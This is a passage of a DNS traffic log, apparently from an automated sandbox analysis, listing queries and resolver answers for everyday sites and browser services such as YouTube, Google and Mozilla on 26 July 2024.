Jul 26, 2024 20:11:03.407411098 CEST	192.168.2.5	1.1.1.1	0x8865	Standard query (0)	www.wired.com	28	IN (0x0001)	false
Jul 26, 2024 20:11:05.798717976 CEST	192.168.2.5	1.1.1.1	0xea55	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Jul 26, 2024 20:11:10.354477882 CEST	192.168.2.5	1.1.1.1	0xdb82	Standard query (0)	www.jezebel.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:10.354557991 CEST	192.168.2.5	1.1.1.1	0x8eb6	Standard query (0)	eat.hungryroot.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:10.365281105 CEST	192.168.2.5	1.1.1.1	0xd9d7	Standard query (0)	www.jezebel.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:10.373224974 CEST	192.168.2.5	1.1.1.1	0x83c0	Standard query (0)	eat.hungryroot.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:10.374252081 CEST	192.168.2.5	1.1.1.1	0x862a	Standard query (0)	www.jezebel.com	28	IN (0x0001)	false
Jul 26, 2024 20:11:10.390876055 CEST	192.168.2.5	1.1.1.1	0xb66	Standard query (0)	eat.hungryroot.com	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 26, 2024 20:10:11.458493948 CEST	1.1.1.1	192.168.2.5	0x71c9	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:11.458493948 CEST	1.1.1.1	192.168.2.5	0x71c9	No error (0)	youtube-ui.l.google.com			65	IN (0x0001)	false
Jul 26, 2024 20:10:11.458627939 CEST	1.1.1.1	192.168.2.5	0xf07e	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:11.458627939 CEST	1.1.1.1	192.168.2.5	0xf07e	No error (0)	youtube-ui.l.google.com		172.217.18.14	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:11.458627939 CEST	1.1.1.1	192.168.2.5	0xf07e	No error (0)	youtube-ui.l.google.com		142.250.184.238	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:11.458627939 CEST	1.1.1.1	192.168.2.5	0xf07e	No error (0)	youtube-ui.l.google.com		142.250.184.206	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:11.458627939 CEST	1.1.1.1	192.168.2.5	0xf07e	No error (0)	youtube-ui.l.google.com		142.250.185.174	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:11.458627939 CEST	1.1.1.1	192.168.2.5	0xf07e	No error (0)	youtube-ui.l.google.com		172.217.16.142	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:11.458627939 CEST	1.1.1.1	192.168.2.5	0xf07e	No error (0)	youtube-ui.l.google.com		142.250.185.238	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:11.458627939 CEST	1.1.1.1	192.168.2.5	0xf07e	No error (0)	youtube-ui.l.google.com		142.250.186.110	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:11.458627939 CEST	1.1.1.1	192.168.2.5	0xf07e	No error (0)	youtube-ui.l.google.com		142.250.74.206	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:11.458627939 CEST	1.1.1.1	192.168.2.5	0xf07e	No error (0)	youtube-ui.l.google.com		216.58.206.78	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:11.458627939 CEST	1.1.1.1	192.168.2.5	0xf07e	No error (0)	youtube-ui.l.google.com		142.250.181.238	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:11.458627939 CEST	1.1.1.1	192.168.2.5	0xf07e	No error (0)	youtube-ui.l.google.com		172.217.16.206	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:11.458627939 CEST	1.1.1.1	192.168.2.5	0xf07e	No error (0)	youtube-ui.l.google.com		142.250.185.110	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:11.458627939 CEST	1.1.1.1	192.168.2.5	0xf07e	No error (0)	youtube-ui.l.google.com		142.250.186.174	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:11.458627939 CEST	1.1.1.1	192.168.2.5	0xf07e	No error (0)	youtube-ui.l.google.com		142.250.185.206	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:11.458627939 CEST	1.1.1.1	192.168.2.5	0xf07e	No error (0)	youtube-ui.l.google.com		142.250.186.46	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:11.458627939 CEST	1.1.1.1	192.168.2.5	0xf07e	No error (0)	youtube-ui.l.google.com		142.250.185.142	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:14.431406975 CEST	1.1.1.1	192.168.2.5	0x88bf	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:14.431406975 CEST	1.1.1.1	192.168.2.5	0x88bf	No error (0)	youtube-ui.l.google.com			65	IN (0x0001)	false
Jul 26, 2024 20:10:14.431725025 CEST	1.1.1.1	192.168.2.5	0x3be5	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:14.431725025 CEST	1.1.1.1	192.168.2.5	0x3be5	No error (0)	youtube-ui.l.google.com		172.217.18.14	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:14.431725025 CEST	1.1.1.1	192.168.2.5	0x3be5	No error (0)	youtube-ui.l.google.com		142.250.184.238	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:14.431725025 CEST	1.1.1.1	192.168.2.5	0x3be5	No error (0)	youtube-ui.l.google.com		142.250.185.206	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:14.431725025 CEST	1.1.1.1	192.168.2.5	0x3be5	No error (0)	youtube-ui.l.google.com		142.250.185.78	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:14.431725025 CEST	1.1.1.1	192.168.2.5	0x3be5	No error (0)	youtube-ui.l.google.com		142.250.186.174	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:14.431725025 CEST	1.1.1.1	192.168.2.5	0x3be5	No error (0)	youtube-ui.l.google.com		172.217.16.206	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:14.431725025 CEST	1.1.1.1	192.168.2.5	0x3be5	No error (0)	youtube-ui.l.google.com		216.58.212.142	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:14.431725025 CEST	1.1.1.1	192.168.2.5	0x3be5	No error (0)	youtube-ui.l.google.com		172.217.18.110	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:14.431725025 CEST	1.1.1.1	192.168.2.5	0x3be5	No error (0)	youtube-ui.l.google.com		142.250.185.110	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:14.431725025 CEST	1.1.1.1	192.168.2.5	0x3be5	No error (0)	youtube-ui.l.google.com		142.250.186.110	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:14.431725025 CEST	1.1.1.1	192.168.2.5	0x3be5	No error (0)	youtube-ui.l.google.com		142.250.181.238	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:14.431725025 CEST	1.1.1.1	192.168.2.5	0x3be5	No error (0)	youtube-ui.l.google.com		142.250.186.78	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:14.431725025 CEST	1.1.1.1	192.168.2.5	0x3be5	No error (0)	youtube-ui.l.google.com		216.58.206.46	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:14.431725025 CEST	1.1.1.1	192.168.2.5	0x3be5	No error (0)	youtube-ui.l.google.com		142.250.185.174	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:14.431725025 CEST	1.1.1.1	192.168.2.5	0x3be5	No error (0)	youtube-ui.l.google.com		142.250.186.142	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:14.431725025 CEST	1.1.1.1	192.168.2.5	0x3be5	No error (0)	youtube-ui.l.google.com		142.250.185.238	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:15.051521063 CEST	1.1.1.1	192.168.2.5	0xa42b	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:15.051529884 CEST	1.1.1.1	192.168.2.5	0xa513	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:15.051529884 CEST	1.1.1.1	192.168.2.5	0xa513	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:15.859224081 CEST	1.1.1.1	192.168.2.5	0x8e5e	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:15.859261036 CEST	1.1.1.1	192.168.2.5	0x1939	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:18.944010973 CEST	1.1.1.1	192.168.2.5	0x5d3b	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:18.944010973 CEST	1.1.1.1	192.168.2.5	0x5d3b	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:18.944153070 CEST	1.1.1.1	192.168.2.5	0x1dfe	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jul 26, 2024 20:10:18.944308996 CEST	1.1.1.1	192.168.2.5	0xe40a	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jul 26, 2024 20:10:18.944683075 CEST	1.1.1.1	192.168.2.5	0xba82	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:18.944683075 CEST	1.1.1.1	192.168.2.5	0xba82	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:18.975774050 CEST	1.1.1.1	192.168.2.5	0xc5ee	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:18.975774050 CEST	1.1.1.1	192.168.2.5	0xc5ee	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:18.976414919 CEST	1.1.1.1	192.168.2.5	0x5e3b	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Jul 26, 2024 20:10:19.612555981 CEST	1.1.1.1	192.168.2.5	0xba81	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:19.612555981 CEST	1.1.1.1	192.168.2.5	0xba81	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.161	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:19.613404989 CEST	1.1.1.1	192.168.2.5	0x1082	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:21.713015079 CEST	1.1.1.1	192.168.2.5	0x36a3	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:21.740993977 CEST	1.1.1.1	192.168.2.5	0xd815	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:22.286523104 CEST	1.1.1.1	192.168.2.5	0x58af	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:22.286523104 CEST	1.1.1.1	192.168.2.5	0x58af	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:22.302851915 CEST	1.1.1.1	192.168.2.5	0x6e38	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:22.338654041 CEST	1.1.1.1	192.168.2.5	0xf1a6	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net			28	IN (0x0001)	false
Jul 26, 2024 20:10:23.952405930 CEST	1.1.1.1	192.168.2.5	0x2ed5	No error (0)	example.org		93.184.215.14	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:23.995270014 CEST	1.1.1.1	192.168.2.5	0xb416	No error (0)	ipv4only.arpa		192.0.0.170	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:23.995270014 CEST	1.1.1.1	192.168.2.5	0xb416	No error (0)	ipv4only.arpa		192.0.0.171	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:24.010857105 CEST	1.1.1.1	192.168.2.5	0xb4f	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:24.010857105 CEST	1.1.1.1	192.168.2.5	0xb4f	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:24.734379053 CEST	1.1.1.1	192.168.2.5	0x6714	No error (0)	accounts.youtube.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:24.734379053 CEST	1.1.1.1	192.168.2.5	0x6714	No error (0)	www3.l.google.com		142.250.185.238	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:24.734530926 CEST	1.1.1.1	192.168.2.5	0xb8fa	No error (0)	accounts.youtube.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:27.317313910 CEST	1.1.1.1	192.168.2.5	0xe4af	No error (0)	play.google.com		142.250.185.142	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:29.254826069 CEST	1.1.1.1	192.168.2.5	0x1a7c	No error (0)	www.google.com		172.217.18.4	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:29.254842997 CEST	1.1.1.1	192.168.2.5	0xdcca	No error (0)	www.google.com			65	IN (0x0001)	false
Jul 26, 2024 20:10:31.931992054 CEST	1.1.1.1	192.168.2.5	0x9b64	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:31.931992054 CEST	1.1.1.1	192.168.2.5	0x9b64	No error (0)	youtube-ui.l.google.com		142.250.181.238	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.931992054 CEST	1.1.1.1	192.168.2.5	0x9b64	No error (0)	youtube-ui.l.google.com		142.250.186.46	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.931992054 CEST	1.1.1.1	192.168.2.5	0x9b64	No error (0)	youtube-ui.l.google.com		142.250.186.78	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.931992054 CEST	1.1.1.1	192.168.2.5	0x9b64	No error (0)	youtube-ui.l.google.com		142.250.185.78	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.931992054 CEST	1.1.1.1	192.168.2.5	0x9b64	No error (0)	youtube-ui.l.google.com		142.250.185.238	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.931992054 CEST	1.1.1.1	192.168.2.5	0x9b64	No error (0)	youtube-ui.l.google.com		142.250.185.206	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.931992054 CEST	1.1.1.1	192.168.2.5	0x9b64	No error (0)	youtube-ui.l.google.com		142.250.186.174	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.931992054 CEST	1.1.1.1	192.168.2.5	0x9b64	No error (0)	youtube-ui.l.google.com		142.250.185.174	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.931992054 CEST	1.1.1.1	192.168.2.5	0x9b64	No error (0)	youtube-ui.l.google.com		142.250.184.238	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.931992054 CEST	1.1.1.1	192.168.2.5	0x9b64	No error (0)	youtube-ui.l.google.com		172.217.16.206	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.931992054 CEST	1.1.1.1	192.168.2.5	0x9b64	No error (0)	youtube-ui.l.google.com		142.250.185.110	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.931992054 CEST	1.1.1.1	192.168.2.5	0x9b64	No error (0)	youtube-ui.l.google.com		216.58.212.142	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.931992054 CEST	1.1.1.1	192.168.2.5	0x9b64	No error (0)	youtube-ui.l.google.com		216.58.206.78	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.931992054 CEST	1.1.1.1	192.168.2.5	0x9b64	No error (0)	youtube-ui.l.google.com		216.58.206.46	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.931992054 CEST	1.1.1.1	192.168.2.5	0x9b64	No error (0)	youtube-ui.l.google.com		142.250.186.142	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.931992054 CEST	1.1.1.1	192.168.2.5	0x9b64	No error (0)	youtube-ui.l.google.com		142.250.186.110	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.947251081 CEST	1.1.1.1	192.168.2.5	0xcf43	No error (0)	youtube-ui.l.google.com		172.217.23.110	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.947251081 CEST	1.1.1.1	192.168.2.5	0xcf43	No error (0)	youtube-ui.l.google.com		142.250.185.206	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.947251081 CEST	1.1.1.1	192.168.2.5	0xcf43	No error (0)	youtube-ui.l.google.com		142.250.181.238	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.947251081 CEST	1.1.1.1	192.168.2.5	0xcf43	No error (0)	youtube-ui.l.google.com		172.217.16.142	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.947251081 CEST	1.1.1.1	192.168.2.5	0xcf43	No error (0)	youtube-ui.l.google.com		172.217.18.110	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.947251081 CEST	1.1.1.1	192.168.2.5	0xcf43	No error (0)	youtube-ui.l.google.com		216.58.212.174	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.947251081 CEST	1.1.1.1	192.168.2.5	0xcf43	No error (0)	youtube-ui.l.google.com		142.250.185.110	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.947251081 CEST	1.1.1.1	192.168.2.5	0xcf43	No error (0)	youtube-ui.l.google.com		142.250.186.142	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.947251081 CEST	1.1.1.1	192.168.2.5	0xcf43	No error (0)	youtube-ui.l.google.com		216.58.206.46	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.947251081 CEST	1.1.1.1	192.168.2.5	0xcf43	No error (0)	youtube-ui.l.google.com		142.250.184.238	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.947251081 CEST	1.1.1.1	192.168.2.5	0xcf43	No error (0)	youtube-ui.l.google.com		142.250.185.142	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.947251081 CEST	1.1.1.1	192.168.2.5	0xcf43	No error (0)	youtube-ui.l.google.com		216.58.206.78	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.947251081 CEST	1.1.1.1	192.168.2.5	0xcf43	No error (0)	youtube-ui.l.google.com		142.250.185.174	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.947251081 CEST	1.1.1.1	192.168.2.5	0xcf43	No error (0)	youtube-ui.l.google.com		142.250.186.46	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.947251081 CEST	1.1.1.1	192.168.2.5	0xcf43	No error (0)	youtube-ui.l.google.com		142.250.185.238	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.947251081 CEST	1.1.1.1	192.168.2.5	0xcf43	No error (0)	youtube-ui.l.google.com		142.250.185.78	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:31.954633951 CEST	1.1.1.1	192.168.2.5	0xf43e	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Jul 26, 2024 20:10:31.954633951 CEST	1.1.1.1	192.168.2.5	0xf43e	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Jul 26, 2024 20:10:31.954633951 CEST	1.1.1.1	192.168.2.5	0xf43e	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Jul 26, 2024 20:10:31.954633951 CEST	1.1.1.1	192.168.2.5	0xf43e	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Jul 26, 2024 20:10:34.297571898 CEST	1.1.1.1	192.168.2.5	0x1e0d	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:34.297571898 CEST	1.1.1.1	192.168.2.5	0x1e0d	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:34.298468113 CEST	1.1.1.1	192.168.2.5	0x41e7	No error (0)	content-signature-2.cdn.mozilla.net	content-signature-chains.prod.autograph.services.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:34.298468113 CEST	1.1.1.1	192.168.2.5	0x41e7	No error (0)	content-signature-chains.prod.autograph.services.mozaws.net	prod.content-signature-chains.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:34.298468113 CEST	1.1.1.1	192.168.2.5	0x41e7	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:34.311626911 CEST	1.1.1.1	192.168.2.5	0xc8e5	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:34.580754042 CEST	1.1.1.1	192.168.2.5	0x3648	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net			28	IN (0x0001)	false
Jul 26, 2024 20:10:34.792387962 CEST	1.1.1.1	192.168.2.5	0x2633	No error (0)	mitmdetection.services.mozilla.com		143.204.9.50	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:34.792387962 CEST	1.1.1.1	192.168.2.5	0x2633	No error (0)	mitmdetection.services.mozilla.com		143.204.9.29	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:34.792387962 CEST	1.1.1.1	192.168.2.5	0x2633	No error (0)	mitmdetection.services.mozilla.com		143.204.9.66	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:34.792387962 CEST	1.1.1.1	192.168.2.5	0x2633	No error (0)	mitmdetection.services.mozilla.com		143.204.9.107	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:34.820828915 CEST	1.1.1.1	192.168.2.5	0x3cb2	No error (0)	mitmdetection.services.mozilla.com		143.204.9.66	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:34.820828915 CEST	1.1.1.1	192.168.2.5	0x3cb2	No error (0)	mitmdetection.services.mozilla.com		143.204.9.29	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:34.820828915 CEST	1.1.1.1	192.168.2.5	0x3cb2	No error (0)	mitmdetection.services.mozilla.com		143.204.9.50	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:34.820828915 CEST	1.1.1.1	192.168.2.5	0x3cb2	No error (0)	mitmdetection.services.mozilla.com		143.204.9.107	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:34.830441952 CEST	1.1.1.1	192.168.2.5	0xdaf5	No error (0)	mitmdetection.services.mozilla.com			28	IN (0x0001)	false
Jul 26, 2024 20:10:34.830441952 CEST	1.1.1.1	192.168.2.5	0xdaf5	No error (0)	mitmdetection.services.mozilla.com			28	IN (0x0001)	false
Jul 26, 2024 20:10:34.830441952 CEST	1.1.1.1	192.168.2.5	0xdaf5	No error (0)	mitmdetection.services.mozilla.com			28	IN (0x0001)	false
Jul 26, 2024 20:10:34.830441952 CEST	1.1.1.1	192.168.2.5	0xdaf5	No error (0)	mitmdetection.services.mozilla.com			28	IN (0x0001)	false
Jul 26, 2024 20:10:34.830441952 CEST	1.1.1.1	192.168.2.5	0xdaf5	No error (0)	mitmdetection.services.mozilla.com			28	IN (0x0001)	false
Jul 26, 2024 20:10:34.830441952 CEST	1.1.1.1	192.168.2.5	0xdaf5	No error (0)	mitmdetection.services.mozilla.com			28	IN (0x0001)	false
Jul 26, 2024 20:10:34.830441952 CEST	1.1.1.1	192.168.2.5	0xdaf5	No error (0)	mitmdetection.services.mozilla.com			28	IN (0x0001)	false
Jul 26, 2024 20:10:34.830441952 CEST	1.1.1.1	192.168.2.5	0xdaf5	No error (0)	mitmdetection.services.mozilla.com			28	IN (0x0001)	false
Jul 26, 2024 20:10:37.544193029 CEST	1.1.1.1	192.168.2.5	0xfe94	No error (0)	o.pki.goog	pki-goog.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:37.544193029 CEST	1.1.1.1	192.168.2.5	0xfe94	No error (0)	pki-goog.l.google.com		142.250.185.227	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:37.552401066 CEST	1.1.1.1	192.168.2.5	0x959a	No error (0)	pki-goog.l.google.com		172.217.16.195	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:37.559912920 CEST	1.1.1.1	192.168.2.5	0x76cd	No error (0)	pki-goog.l.google.com			28	IN (0x0001)	false
Jul 26, 2024 20:10:39.224502087 CEST	1.1.1.1	192.168.2.5	0xd66b	No error (0)	support.mozilla.org	prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:39.224502087 CEST	1.1.1.1	192.168.2.5	0xd66b	No error (0)	prod.sumo.prod.webservices.mozgcp.net	us-west1.prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:39.224502087 CEST	1.1.1.1	192.168.2.5	0xd66b	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:39.251024961 CEST	1.1.1.1	192.168.2.5	0xf628	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:44.099407911 CEST	1.1.1.1	192.168.2.5	0x561e	No error (0)	accounts.youtube.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:44.099407911 CEST	1.1.1.1	192.168.2.5	0x561e	No error (0)	www3.l.google.com		172.217.16.142	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:44.108732939 CEST	1.1.1.1	192.168.2.5	0x18eb	No error (0)	www3.l.google.com		142.250.185.238	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:44.117441893 CEST	1.1.1.1	192.168.2.5	0x321a	No error (0)	www3.l.google.com			28	IN (0x0001)	false
Jul 26, 2024 20:10:44.709227085 CEST	1.1.1.1	192.168.2.5	0xc348	No error (0)	www.google.com		142.250.186.164	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:44.718408108 CEST	1.1.1.1	192.168.2.5	0xe83e	No error (0)	www.google.com		142.250.186.164	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:44.726514101 CEST	1.1.1.1	192.168.2.5	0x8901	No error (0)	www.google.com			28	IN (0x0001)	false
Jul 26, 2024 20:10:45.013250113 CEST	1.1.1.1	192.168.2.5	0xe1d6	No error (0)	play.google.com		172.217.16.206	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:45.022753954 CEST	1.1.1.1	192.168.2.5	0xf82b	No error (0)	play.google.com		172.217.23.110	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:45.030502081 CEST	1.1.1.1	192.168.2.5	0x7860	No error (0)	play.google.com			28	IN (0x0001)	false
Jul 26, 2024 20:10:48.854793072 CEST	1.1.1.1	192.168.2.5	0x668d	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:48.854804993 CEST	1.1.1.1	192.168.2.5	0x2bd0	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:48.854804993 CEST	1.1.1.1	192.168.2.5	0x2bd0	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:48.855043888 CEST	1.1.1.1	192.168.2.5	0xde64	No error (0)	spocs.getpocket.com	prod.ads.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:48.855043888 CEST	1.1.1.1	192.168.2.5	0xde64	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
